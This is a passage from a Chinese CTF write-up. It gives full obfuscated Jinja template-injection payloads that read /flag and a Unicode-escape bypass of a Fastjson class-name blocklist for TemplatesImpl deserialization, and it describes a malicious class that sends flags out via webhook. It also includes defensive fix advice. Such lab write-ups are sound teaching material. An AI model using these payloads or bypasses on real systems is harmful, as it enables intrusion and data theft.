]]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u56de\u663e\u91cc\u53ef\u4ee5\u770b\u5230\u6a21\u5757\u5168\u5c40\u53d8\u91cf\uff0c\u5305\u62ec <code>os<\/code> \u548c <code>__builtins__<\/code>\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-\u5217\u6839\u76ee\u5f55\">3. 
\u5217\u6839\u76ee\u5f55<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u5229\u7528 <code>os.listdir('\/')<\/code> \u7684\u53d8\u4f53\uff0c\u628a <code>\/<\/code> \u52a8\u6001\u62fc\u51fa\u6765\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    &#91;&#91; ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('o'~'s')|attr('listdir')(((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(47))) ]]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\u7ed3\u679c\u4e2d\u53ef\u4ee5\u770b\u5230\u6839\u76ee\u5f55\u5b58\u5728\uff1a<code>'flag'<\/code><\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"4-\u8bfb\u53d6-flag\">4. \u8bfb\u53d6 <code>\/flag<\/code><\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8 payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    &#91;&#91; (((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('open'))(((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(47) ~ ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(102) ~ ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(108) ~ ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(97) ~ ((lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')).get('_'~'_'~'buil'~'tins'~'_'~'_')).get('chr')(103))|attr('read')() ]]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\uff1a<code>FLAG{87b46c9d-57ee-4dea-b819-6cd172ea7f84}<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\" 
id=\"\u8bb0\u4f4f\u6211-\u4e5f\u8bb0\u4f4f\u5377\u5b97\">\u8bb0\u4f4f\u6211\uff0c\u4e5f\u8bb0\u4f4f\u5377\u5b97<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u4e91\u575e\u5f52\u6863\u4e2d\u5fc3\u6700\u8fd1\u4e0a\u7ebf\u4e86\u8fde\u63a5\u5668\u5de1\u68c0\u529f\u80fd\uff0c\u7528\u6765\u9884\u89c8\u4f4e\u4ee3\u7801\u6a21\u677f\u548c\u68c0\u67e5\u5916\u90e8\u5f52\u6863\u63a5\u53e3\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u4e86\u65b9\u4fbf\u5ba1\u8ba1\u7ec8\u7aef\u957f\u671f\u503c\u5b88\uff0c\u7cfb\u7edf\u8fd8\u5f00\u542f\u4e86\u201c\u8bb0\u4f4f\u767b\u5f55\u72b6\u6001\u201d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u5ba2\u8d26\u53f7\u5df2\u7ecf\u5f00\u653e\u7ed9\u4f60\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">guest \/ guest2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bf7\u8bc4\u4f30\u8fd9\u4e2a\u5f52\u6863\u7cfb\u7edf\u7684\u5b89\u5168\u98ce\u9669\u3002\u8bd5\u8bd5\u80fd\u4e0d\u80fd\u627e\u5230\u79d8\u5bc6<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e00-\u521d\u59cb\u89c2\u5bdf\">\u4e00\u3001\u521d\u59cb\u89c2\u5bdf<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u76ee\u6807\u7ad9\u70b9\u662f\u4e00\u4e2a\u76f4\u63a5\u53ef\u8bbf\u95ee\u7684\u5f52\u6863\u4e2d\u5fc3: <code>http:\/\/8080-a998cc25-435c-465c-bab1-5ef6788ab04a.challenge.ctfplus.cn\/<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u9875\u5728\u672a\u767b\u5f55\u72b6\u6001\u4e0b\u5c31\u80fd\u770b\u5230\u660e\u663e\u7684\u4e1a\u52a1\u7ed3\u6784:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u54c1\u724c\u540d\u662f <code>\u4e91\u575e\u5f52\u6863\u4e2d\u5fc3<\/code><\/li>\n\n\n\n<li>\u526f\u6807\u9898\u662f <code>\u6d41\u7a0b\u6863\u6848\u4e0e\u5916\u90e8\u8fde\u63a5\u5668\u8fd0\u7ef4\u53f0<\/code><\/li>\n\n\n\n<li>\u53f3\u4fa7\u5de5\u4f5c\u533a\u91cc\u6709\u4e00\u5757 
<code>\u8fde\u63a5\u5668\u6a21\u677f\u9884\u89c8<\/code><\/li>\n\n\n\n<li>\u65c1\u8fb9\u8fd8\u7279\u610f\u6807\u4e86\u4e00\u4e2a\u5b57\u6837: <code>legacy parser<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u6a21\u677f\u5185\u5bb9\u4e5f\u5f88\u6709\u4fe1\u606f\u91cf:<code>{\"name\":\"\u5ba1\u8ba1\u6750\u6599\u540c\u6b65\",\"endpoint\":\"internal:\/\/archive\/audit\",\"mode\":\"render\"}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u9ed8\u8ba4\u503c\u5df2\u7ecf\u5728\u6697\u793a\u51e0\u4ef6\u4e8b:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u540e\u7aef\u4f1a\u5904\u7406\u4e00\u6bb5\u5b8c\u6574 JSON<\/li>\n\n\n\n<li>\u5b58\u5728\u5185\u90e8\u534f\u8bae\u5f62\u5f0f\u7684 endpoint<\/li>\n\n\n\n<li>\u7cfb\u7edf\u91cc\u6709\u201c\u65e7\u89e3\u6790\u5668\u201d\u4ecd\u5728\u670d\u5f79<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u7c7b\u9875\u9762\u4e0d\u662f\u90a3\u79cd\u53ea\u6709\u4e00\u4e2a\u767b\u5f55\u6846\u7684\u7a7a\u58f3\u7ad9\uff0c\u800c\u662f\u4ece UI \u5c42\u5c31\u5df2\u7ecf\u628a\u653b\u51fb\u9762\u534a\u66b4\u9732\u51fa\u6765\u4e86\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e8c-rememberme-\u8fd9\u6761\u7ebf\u7d22\u610f\u5473\u7740\u4ec0\u4e48\">\u4e8c\u3001<code>rememberMe<\/code> \u8fd9\u6761\u7ebf\u7d22\u610f\u5473\u7740\u4ec0\u4e48<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u63cf\u8ff0\u660e\u786e\u8bf4\u7cfb\u7edf\u5f00\u542f\u4e86\u201c\u8bb0\u4f4f\u767b\u5f55\u72b6\u6001\u201d\uff0c\u8fd9\u4e0d\u662f\u4e00\u53e5\u5e9f\u8bdd\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u8bbf\u5ba2\u8d26\u53f7\u767b\u5f55\u540e: guest \/ guest2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u54cd\u5e94\u5934\u4f1a\u8fd4\u56de\u957f\u6548 <code>rememberMe<\/code> Cookie\u3002\u800c\u63a5\u53e3 <code>\/api\/session<\/code> \u7684\u8fd4\u56de\u683c\u5f0f\u4e5f\u975e\u5e38\u76f4\u767d: 
<code>{\"principal\":\"guest\",\"authenticated\":false,\"remembered\":true}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u81f3\u5c11\u8bf4\u660e\u4e09\u4ef6\u4e8b:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7cfb\u7edf\u786e\u5b9e\u533a\u5206 <code>authenticated<\/code> \u548c <code>remembered<\/code><\/li>\n\n\n\n<li>\u540e\u7aef\u662f\u5178\u578b Java \u4f1a\u8bdd\u8bed\u4e49（<code>authenticated<\/code>\/<code>remembered<\/code> 的二分与 Shiro <code>Subject<\/code> 的 <code>isAuthenticated()<\/code>\/<code>isRemembered()<\/code> 一致）<\/li>\n\n\n\n<li>\u201c\u8bb0\u4f4f\u6211\u201d\u4e0d\u662f\u88c5\u9970\u6027\u529f\u80fd\uff0c\u800c\u662f\u8fdb\u5165\u5b9e\u9645\u9274\u6743\u6d41\u7a0b\u7684\u4e00\u90e8\u5206<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u5730\u5206\u6790\u8fc7\u7a0b\u91cc\u4e5f\u4fdd\u7559\u4e86\u5927\u91cf\u56f4\u7ed5 <code>rememberMe<\/code> \u7684\u63a2\u6d4b\u75d5\u8ff9:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>remember.txt<\/code><\/li>\n\n\n\n<li><code>cookies_true.txt<\/code><\/li>\n\n\n\n<li><code>DecryptRememberMe.java<\/code><\/li>\n\n\n\n<li><code>DecryptRememberMe2.java<\/code><\/li>\n\n\n\n<li><code>ShiroKeyProbe.java<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e9b\u4fe1\u606f\u5171\u540c\u6307\u5411\u4e00\u4e2a\u5f88\u81ea\u7136\u7684\u5224\u65ad:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6545\u610f\u628a\u9009\u624b\u7684\u7b2c\u4e00\u53cd\u5e94\u5f80 <code>Shiro rememberMe<\/code> \u65b9\u5411\u5e26\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u7ee7\u7eed\u5f80\u4e0b\u505a\u4f1a\u53d1\u73b0\uff0c<code>rememberMe<\/code> \u66f4\u50cf\u662f\u4e00\u5c42\u9898\u9762\u5f15\u5bfc\u548c\u73af\u5883\u63d0\u793a\uff0c\u800c\u4e0d\u662f\u6700\u7ec8\u62ff flag \u7684\u843d\u70b9\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u544a\u8bc9\u6211\u4eec:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8fd9\u662f Java 
\u751f\u6001<\/li>\n\n\n\n<li>\u7cfb\u7edf\u91cc\u5b58\u5728\u201c\u957f\u671f\u517c\u5bb9\u201d\u601d\u8def<\/li>\n\n\n\n<li>\u5f00\u53d1\u98ce\u683c\u504f\u5411\u201c\u529f\u80fd\u80fd\u8dd1\u5c31\u5148\u7559\u7740\u201d<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u800c\u771f\u6b63\u80fd\u628a\u79d8\u5bc6\u62d6\u51fa\u6765\u7684\uff0c\u662f\u53e6\u5916\u4e00\u5757\u540c\u6837\u5e26\u7740\u201c\u517c\u5bb9\u5473\u9053\u201d\u7684\u529f\u80fd\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e09-\u771f\u6b63\u7684\u6838\u5fc3\u63a5\u53e3-api-integration-preview\">\u4e09\u3001\u771f\u6b63\u7684\u6838\u5fc3\u63a5\u53e3: <code>\/api\/integration\/preview<\/code><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u524d\u7aef\u811a\u672c <code>\/js\/app.js<\/code> \u975e\u5e38\u8bda\u5b9e\uff0c\u76f4\u63a5\u66b4\u9732\u4e86\u51e0\u4e2a\u5173\u952e\u63a5\u53e3: GET \/api\/dashboard GET \/api\/records POST \/api\/integration\/preview<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5176\u4e2d\u51b3\u5b9a\u6574\u9898\u8d70\u5411\u7684\uff0c\u662f\u8fd9\u4e2a: <code>POST \/api\/integration\/preview<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5411\u5b83\u53d1\u9001\u6700\u666e\u901a\u7684\u4e1a\u52a1\u6570\u636e:<code>{\"name\":\"\u5ba1\u8ba1\u6750\u6599\u540c\u6b65\",\"endpoint\":\"internal:\/\/archive\/audit\",\"mode\":\"render\"}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\u7ed3\u679c\u4f1a\u51fa\u73b0\u4e00\u4e2a\u975e\u5e38\u5173\u952e\u7684\u5b57\u6bb5:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    {\n      \"rendered\":\"{\\\"mode\\\":\\\"render\\\",\\\"endpoint\\\":\\\"internal:\/\/archive\/audit\\\",\\\"name\\\":\\\"\u5ba1\u8ba1\u6750\u6599\u540c\u6b65\\\"}\",\n      \"parser\":\"fastjson-compat\",\n      \"ok\":true\n    }<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><code>fastjson-compat<\/code> 
\u56db\u4e2a\u5b57\u51e0\u4e4e\u5df2\u7ecf\u628a\u653b\u51fb\u65b9\u5411\u5199\u660e\u4e86\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e0d\u662f\u5355\u7eaf\u7684\u6a21\u677f\u62fc\u63a5\uff0c\u4e5f\u4e0d\u662f\u666e\u901a\u56de\u663e\u63a5\u53e3\u3002\u5b83\u662f\u4e00\u4e2a\u201c\u5148\u6309\u517c\u5bb9\u6a21\u5f0f\u89e3\u6790\u5bf9\u8c61\uff0c\u518d\u628a\u7ed3\u679c\u6e32\u67d3\u51fa\u6765\u201d\u7684\u5165\u53e3\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u800c\u4e00\u65e6\u540e\u7aef\u771f\u7684\u4fdd\u7559\u4e86 Fastjson \u98ce\u683c\u7684\u7c7b\u578b\u80fd\u529b\uff0c\u540e\u9762\u7684\u601d\u8def\u5c31\u5f88\u6e05\u695a\u4e86:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8bd5\u63a2 <code>@type<\/code><\/li>\n\n\n\n<li>\u5224\u65ad\u662f\u5426\u5b9e\u4f8b\u5316\u5bf9\u8c61<\/li>\n\n\n\n<li>\u5224\u65ad\u6709\u6ca1\u6709\u9ad8\u5371\u7c7b\u540d\u8fc7\u6ee4<\/li>\n\n\n\n<li>\u8bc4\u4f30\u80fd\u5426\u6253\u5230\u771f\u5b9e\u53cd\u5e8f\u5217\u5316\u6267\u884c\u9762<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u56db-\u9a8c\u8bc1\u5229\u7528\u9762\">\u56db\u3001\u9a8c\u8bc1\u5229\u7528\u9762<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u56f4\u7ed5 <code>\/api\/integration\/preview<\/code> \u7ee7\u7eed\u6d4b\u8bd5\u540e\uff0c\u53ef\u4ee5\u9010\u6b65\u786e\u8ba4:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u63a5\u53e3\u4f1a\u5904\u7406\u5b8c\u6574 JSON \u5bf9\u8c61<\/li>\n\n\n\n<li>\u5b58\u5728\u7c7b\u578b\u89e3\u6790\u8ff9\u8c61<\/li>\n\n\n\n<li>\u80fd\u8bc6\u522b <code>@type<\/code><\/li>\n\n\n\n<li>\u67d0\u4e9b\u5bf9\u8c61\u4f1a\u88ab\u5b9e\u4f8b\u5316<\/li>\n\n\n\n<li>\u6709\u4e00\u5c42\u201c\u5371\u9669\u5173\u952e\u5b57\u201d\u7f51\u5173<\/li>\n\n\n\n<li>\u4f46\u8fd9\u5c42\u7f51\u5173\u66f4\u50cf\u5b57\u7b26\u4e32\u62e6\u622a\uff0c\u800c\u4e0d\u662f\u4ece\u6839\u4e0a\u5173\u95ed\u7c7b\u578b\u7cfb\u7edf<\/li>\n<\/ul>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u5f88\u5173\u952e\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u4e3a\u5982\u679c\u5b83\u53ea\u662f\u666e\u901a\u767d\u540d\u5355\u6620\u5c04\uff0c\u90a3\u4e48\u540e\u9762\u6240\u6709\u53cd\u5e8f\u5217\u5316\u601d\u8def\u90fd\u4f1a\u76f4\u63a5\u6b7b\u6389\u3002\u4f46\u73b0\u5728\u7684\u60c5\u51b5\u662f:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u7c7b\u578b\u80fd\u529b\u8fd8\u5728\uff0c\u53ea\u662f\u5916\u56f4\u5305\u4e86\u4e00\u5c42\u5e76\u4e0d\u5f7b\u5e95\u7684\u8fc7\u6ee4\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u5c31\u610f\u5473\u7740\u6574\u9898\u5df2\u7ecf\u4ece\u201c\u4e1a\u52a1\u89c2\u5bdf\u201d\u8fdb\u5165\u201c\u5229\u7528\u6784\u9020\u201d\u9636\u6bb5\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e94-\u7b2c\u4e00\u5c42\u7a81\u7834-unicode-\u7ed5\u8fc7\u5371\u9669\u7c7b\u540d\u62e6\u622a\">\u4e94\u3001\u7b2c\u4e00\u5c42\u7a81\u7834: Unicode \u7ed5\u8fc7\u5371\u9669\u7c7b\u540d\u62e6\u622a<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u63a5\u53e3\u4f1a\u660e\u663e\u62e6\u4e00\u4e9b\u9ad8\u5371\u7c7b\u540d\uff0c\u4f8b\u5982:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>TemplatesImpl<\/code><\/li>\n\n\n\n<li><code>TrAXFilter<\/code><\/li>\n\n\n\n<li><code>BeanComparator<\/code><\/li>\n\n\n\n<li class=\"has-medium-font-size\"><code>InvokerTransformer<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u95ee\u9898\u5728\u4e8e\uff0c\u5b83\u62e6\u7684\u662f\u201c\u660e\u6587\u5173\u952e\u5b57\u201d\uff0c\u4e0d\u662f\u6700\u7ec8\u8bed\u4e49\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u628a\u5173\u952e\u5b57\u6bb5\u4e0e\u7c7b\u540d\u90fd\u5199\u6210 Unicode 
\u8f6c\u4e49\u4e4b\u540e\uff0c\u8fc7\u6ee4\u5c31\u53ef\u4ee5\u88ab\u7ed5\u8fc7\u3002\u6700\u5c0f\u5316\u793a\u610f\u5982\u4e0b:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    {\n      \"\\u0040type\":\"\\u0063\\u006f\\u006d\\u002e\\u0073\\u0075\\u006e\\u002e...\"\n    }<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u4e4b\u540e\uff0c\u771f\u6b63\u91cd\u8981\u7684\u91cc\u7a0b\u7891\u662f:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/code> \u6210\u529f\u88ab\u5b9e\u4f8b\u5316\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u65e6\u8fd9\u4e00\u70b9\u88ab\u786e\u8ba4\uff0c\u8bf4\u660e\u540e\u7aef\u7684\u201clegacy parser\u201d\u4e0d\u662f\u5f92\u6709\u5176\u540d\uff0c\u5b83\u662f\u771f\u7684\u628a\u5371\u9669 Java \u7c7b\u5e26\u8fdb\u4e86\u8fd0\u884c\u671f\u5bf9\u8c61\u56fe\u91cc\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">防御侧备注：从绕过成立可以推断，关键字过滤作用在解析之前的原始字符串上，而 <code>\\u0040type<\/code> 这类转义要到解析器解码后才还原成明文——任何在解析之前做的字符串拦截，都能被解析器接受的其他编码方式绕过。真正的修复不是继续往黑名单里加词，而是从根上关闭类型解析：Fastjson 中关闭 <code>autoType<\/code>、启用 <code>safeMode<\/code>，或把允许反序列化的类限制为显式白名单；兼容旧解析器的需求应通过固定的 DTO 映射实现，而不是保留 <code>@type<\/code> 能力。<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u516d-\u4e3a\u4ec0\u4e48\u4e00\u5f00\u59cb\u59cb\u7ec8\u4e0d\u51fa\u7f51\">\u516d\u3001\u4e3a\u4ec0\u4e48\u4e00\u5f00\u59cb\u59cb\u7ec8\u4e0d\u51fa\u7f51<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8d70\u5230\u8fd9\u91cc\uff0c\u9898\u76ee\u770b\u8d77\u6765\u5df2\u7ecf\u63a5\u8fd1\u7ed3\u675f\u3002\u4f46\u771f\u6b63\u6700\u5bb9\u6613\u5361\u4eba\u7684\u5730\u65b9\uff0c\u6070\u597d\u5c31\u5728\u8fd9\u4e00\u6bb5\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u521d\u65e0\u8bba\u662f\u5c1d\u8bd5:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>TrAXFilter<\/code> \u89e6\u53d1<\/li>\n\n\n\n<li><code>outputProperties<\/code> \u89e6\u53d1<\/li>\n\n\n\n<li>\u5176\u4ed6\u6a21\u677f\u94fe\u5305\u88c5\u65b9\u5f0f<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u73b0\u8c61\u90fd\u975e\u5e38\u63a5\u8fd1:<\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>\u63a5\u53e3\u62a5 <code>JSONException<\/code><\/li>\n\n\n\n<li>\u770b\u8d77\u6765\u50cf\u662f\u5df2\u7ecf\u6253\u4e2d\u4e86<\/li>\n\n\n\n<li>\u4f46\u6076\u610f\u903b\u8f91\u59cb\u7ec8\u6ca1\u6709\u771f\u6b63\u6267\u884c\u6210\u529f<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53ea\u76ef\u7740 gadget \u5f62\u72b6\uff0c\u5f88\u5bb9\u6613\u5f97\u51fa\u9519\u8bef\u7ed3\u8bba:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u94fe\u6761\u4e0d\u5bf9<\/li>\n\n\n\n<li>getter \u6ca1\u547d\u4e2d<\/li>\n\n\n\n<li>\u89e6\u53d1\u70b9\u9009\u9519\u4e86<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u672c\u9898\u771f\u6b63\u7684\u95ee\u9898\uff0c\u4e0d\u5728\u5229\u7528\u94fe\u5f62\u72b6\uff0c\u800c\u5728\u8fd0\u884c\u65f6\u73af\u5883\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e03-\u771f\u6b63\u7684\u5751-\u8fdc\u7aef\u662f-jdk-8-\u672c\u5730-payload-\u5374\u662f-java-21\">\u4e03\u3001\u771f\u6b63\u7684\u5751: \u8fdc\u7aef\u662f JDK 8\uff0c\u672c\u5730 payload \u5374\u662f Java 21<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7\u526f\u4f5c\u7528\u6d41\u91cf\u53ef\u4ee5\u786e\u8ba4\u8fdc\u7aef Java \u8fdb\u7a0b\u7279\u5f81: Java\/1.8.0_482<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u800c\u6700\u5f00\u59cb\u585e\u8fdb <code>TemplatesImpl<\/code> \u7684\u6076\u610f translet class\uff0c<code>major version<\/code> \u662f: 65<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4ee3\u8868 Java 21\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u95ee\u9898\u5230\u8fd9\u91cc\u5c31\u5b8c\u5168\u6e05\u695a\u4e86:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u672c\u5730\u751f\u6210\u7684\u6076\u610f\u7c7b\u5c5e\u4e8e Java 21<\/li>\n\n\n\n<li>\u8fdc\u7aef\u8fd0\u884c\u73af\u5883\u53ea\u6709 JDK 8<\/li>\n\n\n\n<li>JDK 8 \u53bb\u52a0\u8f7d Java 21 \u7684 class\uff0c\u5fc5\u7136\u5931\u8d25<\/li>\n<\/ul>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u4e8e\u662f\u624d\u4f1a\u51fa\u73b0\u4e00\u79cd\u975e\u5e38\u8ff7\u60d1\u7684\u5047\u8c61:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7c7b\u578b\u80fd\u529b\u8fd8\u5728<\/li>\n\n\n\n<li><code>TemplatesImpl<\/code> \u4f3c\u4e4e\u5b9e\u4f8b\u5316\u6210\u529f<\/li>\n\n\n\n<li>\u63a5\u53e3\u4e5f\u786e\u5b9e\u629b\u5f02\u5e38\u4e86<\/li>\n\n\n\n<li>\u4f46\u771f\u6b63\u7684\u6076\u610f\u903b\u8f91\u5c31\u662f\u843d\u4e0d\u4e86\u5730<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6700\u6709\u610f\u601d\u7684\u5730\u65b9\u5c31\u5728\u8fd9\u91cc\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5f88\u591a\u65f6\u5019\uff0c\u4e0d\u662f payload \u9519\u4e86\uff0c\u800c\u662f payload \u6240\u5c5e\u7684\u65f6\u4ee3\u9519\u4e86\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f60\u62ff\u4e00\u4e2a\u5c5e\u4e8e Java 21 \u7684\u7c7b\u53bb\u6253 Java 8\uff0c\u94fe\u518d\u6f02\u4eae\uff0c\u4e5f\u4e0d\u8fc7\u662f\u7eb8\u4e0a\u8c08\u5175\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u516b-\u4fee\u6b63\u601d\u8def-\u91cd\u65b0\u751f\u6210-java-8-\u517c\u5bb9\u6076\u610f\u7c7b\">\u516b\u3001\u4fee\u6b63\u601d\u8def: \u91cd\u65b0\u751f\u6210 Java 8 \u517c\u5bb9\u6076\u610f\u7c7b<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u65e2\u7136\u95ee\u9898\u51fa\u5728\u5b57\u8282\u7801\u7248\u672c\uff0c\u4fee\u6cd5\u5c31\u975e\u5e38\u660e\u786e:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u91cd\u65b0\u751f\u6210\u6076\u610f translet<\/li>\n\n\n\n<li>\u786e\u4fdd class \u6587\u4ef6\u662f Java 8 \u53ef\u52a0\u8f7d\u7248\u672c<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4fee\u6b63\u540e\u7684 <code>major version<\/code>: 52<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f JDK 8 
\u53ef\u6b63\u5e38\u52a0\u8f7d\u7684\u5b57\u8282\u7801\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6076\u610f\u7c7b\u903b\u8f91\u672c\u8eab\u4e0d\u590d\u6742\uff0c\u6838\u5fc3\u5c31\u662f\u4e09\u4ef6\u4e8b:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u4f9d\u6b21\u5c1d\u8bd5\u8bfb\u53d6\u82e5\u5e72\u5019\u9009 flag \u8def\u5f84<\/li>\n\n\n\n<li>\u627e\u5230\u5185\u5bb9\u540e\u62fc\u63a5\u7ed3\u679c<\/li>\n\n\n\n<li>\u901a\u8fc7 webhook \u5916\u5e26\u56de\u4f20<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c1d\u8bd5\u8fc7\u7684\u5178\u578b\u8def\u5f84\u5305\u62ec:<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    \/flag\n    